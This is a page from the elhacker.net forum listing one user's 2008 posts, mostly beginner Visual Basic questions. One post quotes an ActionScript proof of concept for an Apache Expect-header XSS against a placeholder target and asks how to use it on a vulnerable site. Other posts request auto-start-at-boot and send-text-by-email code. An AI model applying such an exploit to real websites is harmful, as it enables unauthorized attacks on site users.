elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Temas
Páginas: 1 2 3 4 5 [6] 7
51  Programación / Programación Visual Basic / Escribir .ini en: 24 Mayo 2008, 21:41 pm
Bueno quiero un codigo que a un .ini le escriba:

User: x
Dato: y


y que cuando se ejecute el programa lea

User: x y haga que el
Código
  1. Text1.text = x
Dato: y y haga que el
Código
  1. Text2.text = y
52  Programación / Programación Visual Basic / Porque no clikea... en: 24 Mayo 2008, 13:48 pm
Bueno tengo este codigo

Código
  1. send_comand_Click
Lo pongo en el Load del form, y cuando se inicia no me da error, pero tampoco se cliquea, saben porque?
53  Seguridad Informática / Nivel Web / Duda exploit Apache Expect XSS en: 18 Mayo 2008, 12:08 pm
Bueno tengo este exploit
Código:
var req:LoadVars=new LoadVars();
req.addRequestHeader("Expect",
"<script>alert('gotcha!')</script>");
req.send("http://www.target.site/","_blank","GET");
y quiero explotarlo en una web vulnerable a el, pero no se como, si lo saben diganmelo. Gracias ;)
54  Programación / Programación Visual Basic / ¿Porque no funciona? en: 13 Abril 2008, 21:21 pm
Al apretar un command deberia hacer esto:

Código:
msn.CreateGroup namegroup.text

Tengo la libreria del msn y todo, pero cuando lo hgo mee dicE:

"Argument no optional"
55  Programación / Programación Visual Basic / [Ayuda] Otro cursor en: 12 Abril 2008, 23:04 pm
Pues queria saber como se hace, que cuando pases el cursor(flechita) por envima de el form te salga otro cursor :S
56  Programación / Programación Visual Basic / Un formulario dentro de otro en: 3 Abril 2008, 18:17 pm
Como se hace para que dentro de un formulario aparezca Form2 ?
x ejemplo, cuando se ejecute el Form1, dentro aparezca el Form2
57  Programación / Programación Visual Basic / [Problema] Icono en: 31 Marzo 2008, 11:09 am
Bueno en VB intento poner un icono de 32*32 y me dice invalid picture lo meto de 24*24 también me dice lo mismo... ¿Eso por que es?
58  Programación / Programación Visual Basic / Enviar... en: 21 Marzo 2008, 13:17 pm
Pues quiero saber si hay algun codigo, para cuando metan algo en el text1 y le den al command enviar, me llege lo del text1 en un email a mi correo. Grax
59  Programación / Programación Visual Basic / Al iniciar Windows en: 19 Marzo 2008, 13:45 pm
Queria saber si hay y lo puedeen postear algun codigo que lo pongas en tu programa y cada vez que se ejecute WINDOWS se abra el programa gracias.
60  Programación / Programación Visual Basic / [Ayuda] Codigo de Inicio en: 9 Enero 2008, 20:24 pm
Quiero que cuando se descarguen mi programa y lo abran por primera vez, desde ese momento, cada vez que se inicie windows se ejecute.
Páginas: 1 2 3 4 5 [6] 7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines